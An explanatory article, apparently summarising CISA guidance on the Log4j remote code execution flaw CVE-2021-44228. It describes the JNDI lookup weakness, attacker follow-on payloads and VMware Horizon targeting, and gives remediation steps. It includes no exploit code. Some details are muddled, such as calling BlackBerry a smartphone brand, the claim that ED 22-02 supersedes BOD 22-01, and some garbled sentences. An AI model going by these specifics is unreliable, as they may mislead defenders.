The Cybersecurity and Infrastructure Security Agency (CISA) and its partners are responding to the widespread exploitation of a critical remote code execution (RCE) vulnerability in Apache’s Log4j software library, which security analysts are tracking as CVE-2021-44228.
Log4j is used in a wide variety of products to log security and performance information, including applications, services and websites for both consumer and enterprise services. Once malicious actors complete the initial compromise of the system, they use PowerShell commands to download a second payload such as cryptomining malware or ransomware. In particular, some attacks have deployed a Cobalt Strike beacon. VMWare’s Horizon products appear to be one of the most attractive targets for actors exploiting this vulnerability.
Analyst identified CVE-2021-44228 in early December 2021, which affects Log4j versions 2.0-beta9 to 2.14.1. State-sponsored threat actors and cybercriminals began to exploit this vulnerability shortly after its discovery. For example, VMWare reported in VMSA 2021-0028 that its Horizon servers have been compromised. This document was initially released on December 10, 2021, but VMWare is updating it regularly with new information.
VMWare has already released patches for Log4j, but customers have been slow to apply them. As a result, actors seem to be showing a preference for unpatched servers. BlackBerry has also reported an increase in the number of Log4j attacks on the Tomcat service that VMWare Horizon uses. The smartphone brand adds that it can reliably detect compromised systems by monitoring child processes of ws_TomcatService.exe.
CVE-2021-44228 is the result of the way in which the Java Naming and Directory Interface (JNDI) resolves variables. The versions of Log4j affected by this vulnerability use JNDI features like message lookup substitution that lack protection against endpoints controlled by an adversary, including Lightweight Directory Access Protocol (LDAP). Adversaries are able to exploit CVE-2021-44228 by submitting a request to a target system that’s specifically designed to execute arbitrary code. This request allows the adversary to take control over the system, so they can conduct malicious acts such as launching ransomware and stealing information.
The most important action organizations can take to remediate the threat posed by CVE-2021-44228 is to upgrade to Log4j versions 2.3.2, 2.12.4 and 2.17.1, which protects Java 6, 7 and 8 respectively. They should also monitor the Apache Log4j Security Vulnerabilities webpage, which Apache updates regularly with guidance on remediation measures for Log4j vulnerabilities. In addition, users should refer to their vendors for updates on their products and services.
CISA is urging vendors to take additional action to minimize the risk of sophisticated actors exploiting CVE-2021-44228. These actions are particularly important given the severity of this vulnerability. Vendors should immediately identify, mitigate and update any of their products and services that use Log4j to the latest version. They should also inform their users of any products containing these vulnerabilities and strongly they apply the appropriate updates.
Organizations affected by CVE-2021-44228 should also review CISA’s review CISA’s GitHub repository for vendor information, so they can apply updates as they become available. CISA has already added CVE-2021-44228 to its Known Exploited Vulnerabilities Catalog, as directed by Binding Operational Directive (BOD) 22-01. This document provides instructions for reducing the risk of exploited vulnerabilities.
CISA also issued Emergency Directive (ED) 22-02, which provides instructions on mitigating Apache Log4j vulnerabilities. It directs the executive branch of the federal government to address these vulnerabilities, especially CVE-2021-44228. ED 22-02 also requires the agencies to implement additional measures to protect vulnerable products in cases where the official patches aren’t available yet. Agencies should prioritize mission-critical systems, followed by other IT assets. For example, agencies must patch their internet-facing systems immediately, since they’re particularly vulnerable to exploits of CVE-2021-44228. ED 22-02 thus supercedes BOD 22-01, which provides more lenient deadlines for patching internet-facing systems.